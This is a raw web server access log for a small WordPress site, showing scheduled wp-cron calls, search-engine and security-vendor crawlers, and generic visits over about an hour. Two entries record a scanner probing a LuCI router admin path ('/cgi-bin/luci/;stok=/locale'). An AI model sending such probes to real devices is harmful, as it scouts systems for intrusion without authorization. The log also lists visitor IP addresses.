36.133.115.36 - - [03/Oct/2025:14:52:43 +0800] "POST /wp-cron.php?doing_wp_cron=1759474363.7855510711669921875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.208.96.195 - - [03/Oct/2025:14:52:43 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.195 - - [03/Oct/2025:15:15:52 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [03/Oct/2025:15:16:54 +0800] "POST /wp-cron.php?doing_wp_cron=1759475813.9746379852294921875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [03/Oct/2025:15:16:54 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.60.141.156 - - [03/Oct/2025:15:16:55 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [03/Oct/2025:15:26:57 +0800] "POST /wp-cron.php?doing_wp_cron=1759476417.5278298854827880859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.109 - - [03/Oct/2025:15:26:57 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
45.142.195.99 - - [03/Oct/2025:15:27:01 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.216.150.232 - - [03/Oct/2025:15:27:37 +0800] "GET / HTTP/1.1" 200 33465 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [03/Oct/2025:15:36:17 +0800] "POST /wp-cron.php?doing_wp_cron=1759476977.7095139026641845703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.174.93.12 - - [03/Oct/2025:15:36:17 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) MxBrowser/4.5.10.7000 Chrome/30.0.1551.0 Safari/537.36"
36.133.115.36 - - [03/Oct/2025:15:45:17 +0800] "POST /wp-cron.php?doing_wp_cron=1759477517.4612429141998291015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.15 - - [03/Oct/2025:15:45:17 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
36.133.115.36 - - [03/Oct/2025:15:56:25 +0800] "POST /wp-cron.php?doing_wp_cron=1759478185.6825129985809326171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:15:56:25 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:15:59:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759478366.2368400096893310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.71.132 - - [03/Oct/2025:15:59:26 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
